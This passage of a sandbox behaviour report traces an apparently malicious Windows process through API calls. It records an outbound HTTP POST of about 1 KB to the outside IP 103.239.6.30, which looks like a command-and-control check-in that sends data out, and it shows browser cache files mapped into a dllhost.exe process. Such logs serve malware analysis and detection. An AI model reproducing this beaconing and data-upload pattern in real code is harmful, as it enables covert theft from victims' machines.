[0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7b0 | out: hHeap=0x5f0000) returned 1 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3e) returned 0x635190 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5c0, Size=0x3e) returned 0x635210 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635190 | out: hHeap=0x5f0000) returned 1 [0182.059] GetProcessHeap () returned 0x5f0000 [0182.059] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f6e0, Size=0x3d1) returned 0x628380 [0182.059] GetProcAddress (hModule=0x7ffb174f0000, lpProcName="ObtainUserAgentString") returned 0x7ffb1755deb0 [0182.060] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x5ce420, cbSize=0x5ce840 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x5ce840) returned 0x0 [0182.105] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned 156 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9d) returned 0x611f60 [0182.105] lstrcpyA (in: lpString1=0x611f60, lpString2="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" [0182.105] lstrlenA (lpString="*/*") returned 3 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x61f5c0 [0182.105] lstrcpyA (in: lpString1=0x61f5c0, lpString2="*/*" | out: lpString1="*/*") returned="*/*" [0182.105] lstrlenA (lpString="en") returned 2 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f550 [0182.105] lstrcpyA (in: lpString1=0x61f550, lpString2="en" | out: lpString1="en") returned="en" [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f780 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f7f0, Size=0x6) returned 0x61f860 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f780 | out: hHeap=0x5f0000) returned 1 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x636140 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x636220 [0182.105] GetProcessHeap () returned 0x5f0000 [0182.105] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636220, Size=0x6f) returned 0x63e9f0 [0182.106] GetProcessHeap () returned 0x5f0000 [0182.106] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f7c0, Size=0x38) returned 0x6356d0 [0182.106] GetProcessHeap () returned 0x5f0000 [0182.106] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63e9f0 | out: hHeap=0x5f0000) returned 1 [0182.106] GetProcessHeap () returned 0x5f0000 [0182.106] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636140 | out: hHeap=0x5f0000) returned 1 [0182.106] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="InternetOpenA") returned 0x7ffb19daa3b0 [0182.106] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0182.157] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="InternetConnectA") returned 0x7ffb19ea6d40 [0182.158] InternetConnectA (hInternet=0xcc0004, lpszServerName="103.239.6.30", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0182.158] GetProcessHeap () returned 0x5f0000 [0182.158] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f770 [0182.158] GetProcessHeap () returned 0x5f0000 [0182.158] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f690 [0182.158] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpOpenRequestA") returned 0x7ffb19ed20a0 [0182.158] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/84/", lpszVersion="HTTP/1.1", lpszReferrer="", lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f690 | out: hHeap=0x5f0000) returned 1 [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x6365c0 [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f730 [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f750 [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f710 [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f690 [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f6e0 [0182.160] GetProcessHeap () returned 0x5f0000 [0182.160] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f6e0, Size=0x17) returned 0x636800 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f6e0 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f6e0, Size=0x1b) returned 0x6364c0 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f700 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f700, Size=0x37) returned 0x635c50 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1c) returned 0x636840 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636840, Size=0xa5) returned 0x6490e0 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x53) returned 0x618170 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618170, Size=0xa9) returned 0x6491a0 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x55) returned 0x618890 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618890, Size=0xcf) returned 0x649260 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6491a0 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6490e0 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635c50 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6364c0 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636800 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f690 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f710 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f750 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f730 | out: hHeap=0x5f0000) returned 1 [0182.161] GetProcessHeap () returned 0x5f0000 [0182.161] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6365c0 | out: hHeap=0x5f0000) returned 1 [0182.162] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpAddRequestHeadersA") returned 0x7ffb19dc48b0 [0182.162] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*\r\nContent-Type: multipart/form-data; boundary=---------MTJCASJUDXRSUQEV\r\nConnection: Close\r\n", dwHeadersLength=0x67, dwModifiers=0xa0000000) returned 1 [0182.162] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpSendRequestExA") returned 0x7ffb19d7e210 [0182.162] HttpSendRequestExA (in: hRequest=0xcc000c, lpBuffersIn=0x5ce3c0, lpBuffersOut=0x0, dwFlags=0x0, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0183.482] GetProcessHeap () returned 0x5f0000 [0183.482] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1001) returned 0x67d0e0 [0183.482] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="InternetWriteFile") returned 0x7ffb19e22ae0 [0183.483] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x628380*, dwNumberOfBytesToWrite=0x3d0, lpdwNumberOfBytesWritten=0x5ce254 | out: lpBuffer=0x628380*, lpdwNumberOfBytesWritten=0x5ce254*=0x3d0) returned 1 [0183.484] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpEndRequestA") returned 0x7ffb19e38eb0 [0183.484] HttpEndRequestA (hRequest=0xcc000c, lpBuffersOut=0x0, dwFlags=0x0, dwContext=0x0) Thread: id = 120 os_tid = 0x12f0 Thread: id = 121 os_tid = 0x6f4 Thread: id = 122 os_tid = 0x234 Thread: id = 130 os_tid = 0x2a8 Thread: id = 131 os_tid = 0x13f8 Process: id = "6" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0xb042000" os_pid = "0x884" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x278" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1267 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1268 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1269 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1270 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1271 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1272 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1273 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1274 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1275 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1276 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1277 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1278 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1279 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1280 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1281 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1282 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1283 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1284 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1285 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1286 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1287 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1288 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1289 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1290 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1291 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1292 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1293 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1294 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1295 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1296 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1297 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1298 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1299 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1300 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1301 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1302 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1303 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1304 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1305 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1306 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1307 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1308 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1309 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1310 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1311 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1312 start_va = 0x860000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1313 start_va = 0x870000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1314 start_va = 0x880000 end_va = 0x881fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1315 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1316 start_va = 0x8a0000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1317 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1318 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1319 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1320 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1321 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1322 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1323 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1324 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1325 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1326 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1327 start_va = 0xa40000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1328 start_va = 0xa50000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1329 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1330 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: 